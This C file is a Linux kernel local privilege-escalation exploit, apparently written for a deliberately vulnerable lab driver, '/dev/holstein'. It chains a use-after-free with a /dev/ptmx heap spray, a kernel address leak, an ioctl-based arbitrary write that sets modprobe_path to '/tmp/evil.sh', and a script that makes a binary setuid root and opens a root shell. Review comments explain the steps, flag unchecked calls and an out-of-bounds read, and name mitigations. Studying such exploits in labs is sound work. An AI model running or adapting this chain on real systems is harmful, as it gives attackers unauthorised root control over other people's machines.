#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
/* Kernel text base and the kernel address of the device buffer; both are
 * derived in main() from bytes read back through fd2 (offsets 0x18 and 0x38). */
unsigned long kbase, g_buf;
/* Two handles on the same device; fd1 is closed early in main(), fd2 is kept. */
int fd1, fd2;
/* Cached descriptor whose ioctl() succeeded in arb_write(); -1 until found. */
int overwrite_fd = -1;
/* Descriptors from the /dev/ptmx open loop in main(). */
int spray[50];
#define module "/dev/holstein"
/* kbase-relative constants for one specific kernel build; they are not
 * validated at runtime beyond the page-alignment check on kbase in main(). */
#define modprobe (kbase + 0xe38480)
#define write_gad (kbase + 0x1b2d06)
#define BUFFER_SIZE 0x400
/* Staging buffer: filled by read() in main(), then edited in place and
 * written back by arb_write(). Offsets 0x18, 0x38 and 0x3f8 are the ones used. */
char buf[BUFFER_SIZE];
/* Written only by save_state(); nothing else in this file reads them. */
unsigned long user_cs, user_ss, user_sp, user_rflags;
/* Snapshot the user-mode segment selectors, stack pointer and flags into the
 * user_* globals. Uses GCC basic asm in Intel syntax and switches back to AT&T
 * afterwards so the rest of the translation unit assembles normally. The saved
 * values are not consumed anywhere in this file. */
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
}
/* Second stage, run after main() has written the string "/tmp/evil.sh" at the
 * address `modprobe`. Creates a shell script that makes /tmp/exploit setuid
 * root, then executes /tmp/pwn, a four-byte file that is not a valid
 * executable; the expectation is that the kernel reacts by running the
 * program named by modprobe_path (now the script). Finally /tmp/exploit is
 * re-run with one argument, which takes the argc == 2 branch in main().
 *
 * Review notes: every system() result is ignored, so a failed step is not
 * reported; `echo -e` is not portable across /bin/sh implementations; the
 * binary is assumed to live at /tmp/exploit. Kernels built with
 * CONFIG_STATIC_USERMODEHELPER keep modprobe_path read-only, which defeats
 * this step, and a changed modprobe_path is itself a detection signal. */
static void get_root(){
system("echo -e \"#!/bin/sh\nchown root:root /tmp/exploit\nchmod 4555 /tmp/exploit\" > /tmp/evil.sh");
system("chmod +x /tmp/evil.sh");
system("echo -e '\xff\xff\xff\xff' > /tmp/pwn");
system("chmod +x /tmp/pwn");
system("/tmp/pwn");
system("/tmp/exploit mhanz");
}
/* Write the 4-byte value `val` at kernel address `addr`.
 *
 * On the first call (overwrite_fd still -1) the staging buffer is edited and
 * pushed back through fd2: write_gad goes at offset 0x3f8 (the last 8 bytes of
 * the 0x400 buffer) and a pointer into that buffer, g_buf + 0x3f8 - 12*8, at
 * offset 0x18 -- the same offset kbase was derived from in main(). The write()
 * result is not checked. Then each spray descriptor is tried with
 * ioctl(fd, val, addr) -- note `val` travels as the request number and `addr`
 * as the argument -- and the first one not returning -1 is cached.
 *
 * Assumption, not verifiable from this file: the object behind fd2 is now
 * backing whatever the spray descriptors' ioctl path dereferences. If no
 * descriptor succeeds, overwrite_fd stays -1 and the next call repeats the
 * fd2 write. The else branch ignores the ioctl() return value. */
void arb_write(unsigned long addr, unsigned int val){
if (overwrite_fd == -1){
*(unsigned long*)&buf[0x3f8] = write_gad;
*(unsigned long*)&buf[0x18] = g_buf + 0x3f8 - 12*8;
write(fd2, buf, BUFFER_SIZE);
}
if (overwrite_fd == -1){
for (int i=0; i<50; i++){
int r = ioctl(spray[i], val, addr);
if (r != -1) {overwrite_fd = spray[i]; break;}
}
}else{
ioctl(overwrite_fd, val, addr);
}
}
/* Entry point with two roles selected by argc.
 *
 * argc == 2: the re-exec path taken from get_root() ("/tmp/exploit mhanz").
 * Prints the effective uid, drops to uid/gid 0 and spawns a shell. The
 * setuid()/setgid() results are not checked, and geteuid() returns an
 * unsigned uid_t that is printed with %d.
 *
 * Otherwise: opens the device twice, closes fd1, opens 50 /dev/ptmx
 * descriptors, then reads 0x400 bytes back through fd2. The read relies on
 * fd2 still referring to storage that the close of fd1 released and that has
 * presumably been reused by the ptmx objects -- this is an assumption about
 * the driver, not something visible here. kbase is recovered from offset 0x18
 * minus a build-specific constant and sanity-checked for 1 MiB alignment;
 * g_buf from offset 0x38. The string "/tmp/evil.sh" is then written 4 bytes
 * at a time at `modprobe` before handing off to get_root().
 *
 * Review notes: the read() and open() results other than -1 are not checked;
 * perror() appends ": <strerror>" so the "\n" inside its argument lands
 * mid-line; sizeof(overwrite) is 13, so the final iteration (i == 12) reads
 * 3 bytes past the end of `overwrite`, which is undefined behaviour. */
int main(int argc, char* argv[]){
if (argc == 2) {
printf("getuid(): %d\n", geteuid());
setuid(0);
setgid(0);
system("/bin/sh");
return 0;
}
save_state();
fd1 = open(module, O_RDWR);
fd2 = open(module, O_RDWR);
if (fd1 == -1 || fd2 == -1){perror("cannot open module\n"); exit(1);}
/* fd1 is released while fd2 stays open on the same device. */
close(fd1);
for (int i=0; i<50; i++) {spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);}
read(fd2, buf, BUFFER_SIZE);
//for (int i=0; i<100; i+=8) printf("Idx: 0x%x => Value: 0x%lx\n", i, *(unsigned long*)&buf[i]);
kbase = *(unsigned long*)&buf[0x18] -0xc39c60;
/* Kernel text base is expected to be 1 MiB aligned; anything else means the
 * leaked value was not what this build assumes. */
if (kbase % 0x100000 != 0) {perror("leak no good\n"); exit(1);}
/*write(fd2, "fracchetto",10);
0xffffa05d81bea400: 66 72 61 63 63 68 65 74 74 6f 00 00 00 00 00 00 | fracchetto...... |
*/
g_buf = *(unsigned long*)&buf[0x38] - 0x38;
printf("kbase: %lx\n", kbase);
printf("g_buf: %lx\n", g_buf);
printf("modprobe_path: %lx\n", modprobe);
char overwrite[] = "/tmp/evil.sh";
/* 4 bytes per call; NOTE(review): i == 12 reads overwrite[13..15], out of bounds. */
for (int i = 0; i < sizeof(overwrite); i += 4) {arb_write(modprobe + i, *(unsigned int*)&overwrite[i]);}
get_root();
return 0;
}